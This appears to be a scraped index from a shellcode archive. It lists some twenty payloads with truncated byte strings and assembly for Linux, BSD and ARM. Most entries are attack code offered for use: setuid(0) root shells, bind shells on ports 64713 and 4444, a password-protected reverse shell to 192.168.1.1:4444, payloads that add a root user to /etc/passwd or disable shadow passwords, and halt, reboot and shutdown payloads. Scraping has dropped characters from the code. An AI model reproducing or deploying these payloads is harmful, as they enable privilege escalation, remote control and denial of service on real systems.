Linux/x86 - execve(/sbin/halt,/sbin/halt) Shellcode (27 bytes)
include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x66\x68\x6c\x74" // pushw $0x746c "\x68\x6e\x2f\x68\x61" // push $0x61682f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // push %ebx...
BSD/x86 - execve (/bin/sh) + seteuid(0) Shellcode (31 bytes)
/ simply execvebinsh+seteuid0 shellcode in 31 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org nerf nerf /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode = "\x31\xc0\x50\xb0\xb7\xcd\x80\x50\x31\xc0\x50\x68\x2f\x2f\x73"...
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL])) Shellcode (25 bytes)
include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do the setuid0. If you don't want this you can...
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)
include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER tha push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov al,0bh "\x52" //push edx /Termina la cadena //bin/sh con un 0 "\x68\x6e\x2f\x73\x68"...
Linux/x86 - Disable Shadowing Shellcode (42 bytes)
include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER than push and pop! "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov al,0bh "\x52" //push edx /Termina la cadena con un 0 "\x68\x63\x6f\x6e\x76" //push dword...
Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)
/ jmp callw00w00 w00w00: popl %edi jmp w0w0w callw00w00: call w00w00 w0w0w: OPEN ecx=flag ORDONLY, OWRONLY, ... OWRONLY | OAPPEND | OCREAT = 0x441 edx=file mode ebx=address of filename eax=0x05 syscall number xorl %ebx,%ebx movb $file-w0w0w,%bl addl %edi,%ebx xorb %al,%al movb %al,11%ebx xorl...
Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes)
/The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. size = 36 bytes OS = Linux i386 written by /rootteam/dev0id rootteam.void.ru BITS 32 jmp short callit doit: pop esi xor eax,eax mov byte esi+7,al mov byte esi+10,al mov byte al,83 lea ebx,esi lea ecx,esi+8 int...
Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes)
include const char shellcode= "\x40" // inc %eax // "\x43" // inc %ebx "\xcd\x80"; // int $0x80 int main printf "\n+ Yet conditional %eax==0 Linux/x86 exit0 3 bytes or exit1 4 bytes" "\n+ Date: 18/06/2009" "\n+ Author: TheWorm" "\n\n+ Shellcode Size: %d bytes\n\n", sizeofshellcode-1; void...
Linux/x86 - setuid(0) + execve(/bin/sh,0) Shellcode (25 bytes)
include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do the setuid0. If you don't want this you can write "\x6a\x0b\x58" instead of "\xb0\x0b", but the...
Linux/x86 - execve(/sbin/reboot,/sbin/reboot) Shellcode (28 bytes)
include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x62\x6f\x6f\x74" // push $0x746f6f62 "\x68\x6e\x2f\x72\x65" // push $0x65722f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // pu...
Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)
/ linux/x86 portbind /bin/sh port 64713 83 bytes http://www.gonullyourself.org sToRm / char shellcode = // : "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x53" // push %ebx "\x43" // inc %ebx "\x53" // push %ebx "\x6a\x02" // push $0x2 "\x89\xe1" // mov %esp,%ecx...
Linux/x86 - execve(/sbin/shutdown,/sbin/shutdown 0) Shellcode (36 bytes)
include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x64\x6f\x77\x6e" // push $0x6e776f64 "\x68\x73\x68\x75\x74" // push $0x74756873 "\x68\x69\x6e\x2f\x2f" // push $0x2f2f6e69 "\x68\x2f\x2f\x73\x62" // push $0x62732f2f "\x89\xe3" // mov...
Linux/x86 - setuid(0) + execve("/bin/sh",0,0) Shellcode (28 bytes)
/ linux/x86 setuid0 & execve"/bin/sh",0,0 28 bytes http://www.gonullyourself.org sToRm I made this, because http://www.milw0rm.com/shellcode/7115 felt the need to express his "superior" 28-byte shellcode in all caps. I wasn't able to beat his code, but it's no longer special. / char shellcode = /...
Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
/ This shellcode writes to /etc/passwd the string for the user with uid&gid == 0; written by dev0id email protected rootteam.void.ru rus-sec /Efnet.org greetz: nerf w00w00 BITS 32 jmp short path main: pop esi xor eax,eax push eax mov byte esi+11,al mov al,0x0a push eax push esi mov al,5 push eax...
Linux/x86-64 - setreuid(0,0) + execve(/bin/zsh, [/bin/zsh, NULL]) + XOR Encoded Shellcode (87 bytes)
Title: Linux x86-64 setreuid 0,0 & execve"/bin/zsh", "/bin/zsh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
; =================================================================== ; Password Protected Bind Shell ; Author: SLAE64-1351 Keyman ; Date: 03/09/2014 ; ; Shellcode length: 147 bytes ; ; Description: ; ; Simple bind shell listens on port 4444 by default with 4 bytes ; password protection. Using a ...
Linux/x86-64 - shutdown -h now Shellcode (65 bytes)
/ ; Title: shutdown -h now x8664 Shellcode - 65 bytes ; Platform: linux/x8664 ; Date: 2014-06-27 ; Author: Osanda Malith Jayathissa @OsandaMalith section .text global start start: xor rax, rax xor rdx, rdx push rax push byte 0x77 push word 0x6f6e ; now mov rbx, rsp push rax push word 0x682d ;-h m...
Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)
Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh + Password MyPasswd + Null-Free Shellcode 156 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Password Protected Reverse Shell TCP /bin/sh. Null free shellcode 156 bytes Date: 2018-01-15 Tested: armv7l Raspberry Pi v3 Autho...
Linux/x86-64 - shutdown -h now Shellcode (64 bytes)
; =================================================================== ; Optimized version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-877.php ; Author: SLAE64-1351 Keyman ; Date: 14/09/2014 ; ; Length: 64 bytes got shorter by 1 byte :D ; ; What's new is that some...
OpenBSD/x86 - reboot() Shellcode (15 bytes)
// ----------bsd/x86 reboot shellcode----------------- // AUTHOR : beosroot // INFO : OpenBSD x86 reboot shellcode // EMAIL : email protected // email protected char shellcode = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80"; int main int ret = int &ret + 2; ret = intshellcode; //...